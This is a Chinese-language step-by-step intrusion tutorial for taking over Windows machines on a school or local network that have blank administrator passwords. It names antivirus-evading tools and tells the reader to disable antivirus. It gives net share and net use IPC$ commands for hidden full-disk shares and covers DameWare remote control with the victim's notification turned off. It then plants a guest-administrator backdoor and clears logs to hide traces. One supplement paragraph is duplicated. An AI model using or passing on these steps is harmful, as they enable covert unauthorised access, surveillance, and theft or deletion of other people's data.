1.***的範圍只包括局域網,如果在學校上,可以***整個校園網; 2.能***的只是存在弱口令(用戶名爲administrator等,密碼爲空),並且開了139端口,但沒開防火牆的機子。 ***工具: 一般要用到三個:NTscan變態掃描器,Recton--D賀免殺專用版,DameWare迷你中文版 4.5. (前兩個工具殺毒軟件都會報毒,建議將殺毒軟件實時防毒暫時關掉,並將這兩個軟件的壓縮包加密,防止被殺。) ***步驟: 1.使用"NTscan變態掃描器",在IP處填上要掃描的IP範圍,選擇"WMI掃描"方式,按"開始"後就等掃描結果了。
2.使用"Recton--D賀免殺專用版" 選擇"CMD命令"項,在"CMD:"中輸入"net share C$=C:\",即可開啓遠程主機的C盤共享,以此將"C"換成D,E,F等,即可開啓D盤,E盤,F盤等的共享,這種共享方式隱蔽性很高,而且是完全共享,在對方主機上不會出現一隻手托住盤的共享標誌,然後在地址欄中輸入"\\對方IP\C$",即可進入對方C盤。 選擇"Telnet"項,在"遠程主機"中輸入剛纔掃描到的一個IP,遠程啓動Telnet服務,成功後在"CMD選項"中,執行命令:"net share ipc$",接着執行:"net share admin$",最後執行"net use \\***.***.***.***\IPC$ "" /user:administrator"在*處填入你***的主機IP。
3.使用"DameWare迷你中文版 4.5",安裝後點"DameWare Mini Remote Control",在"幫助"項中選擇激活產品,輸入註冊信息,成功註冊後,進入"遠程連接"窗口,在"主機"處填入IP地址,點"設置",在"服務安裝選項"中點"編輯"後,在"通知對話框"中去掉"連接時通知",在"附加設置"中全都不選,在"用戶選項"中去掉"啓用用戶選項菜單"。設置完成好後,就可點"連接",在彈出的對話框中點"確定"後,成功後你就可以像操作自己機子一樣控制別人電腦了,當然你也可以只選擇監視對方屏幕。 注意:如果不註冊的話,在對方主機上會彈出一個對話框,暴露你的身份。
***步驟補充: 1.在以上第2步中,遠程啓動Telnet服務可以通過"我的電腦-管理-連接到另一臺計算機-輸入IP-服務和應用程序-服務-將telnet改爲手動-啓動"完成。
***步驟補充: 1.在以上第2步中,遠程啓動Telnet服務可以通過"我的電腦-管理-連接到另一臺計算機-輸入IP-服務和應用程序-服務-將telnet改爲手動-啓動"完成。
2.Recton--D賀免殺專用版還有其他功能,在"進程"項中,可以查看遠程主機的進程,並可任意結束其中進程;在"共享"項中,可以創建共享,我常用的是創建C$,D$,E$,F$,共享路徑分別對應C:\,D:\等,共享好後在地址欄中輸入"\\IP\C$",進入對方C盤,你就可以隨意複製刪除裏面的東西了,而且這種共享對方機子盤符上不會顯示共享圖標,也就不會被發現,弄完後最好還是把共享給關掉。最後選"日誌",清除所有日誌,不留痕跡。這個軟件會被殺毒軟件當作病毒殺掉,用它時須將實時防毒關掉。
3.上面的共享可通過CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,鍵入y後輸入的用戶名"administrator",密碼爲空, 進入後,開共享用net share命令,共享C$(即C盤):"net share C$=C:",共享system文件夾:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最後是關閉共享,關閉C盤共享:"net share C$ /del"。
4.爲方便下次***,可以設置後門, 查看用戶:"net user",激活guest用戶 "net user guest /active:yes",更改guest的密碼爲poco:"net user guest poco",把guest的權限提升爲管理員權限:"net localgroup administrators guest /add"。 5.telnet命令(dos命令)很多,可去網上查找它的命令,常用的有:查看D盤文件:""dir d:\",查看C盤program file文件夾:"dir c:\PROGRA~1\;",60秒倒記時關機:"shutdown -s -t 60"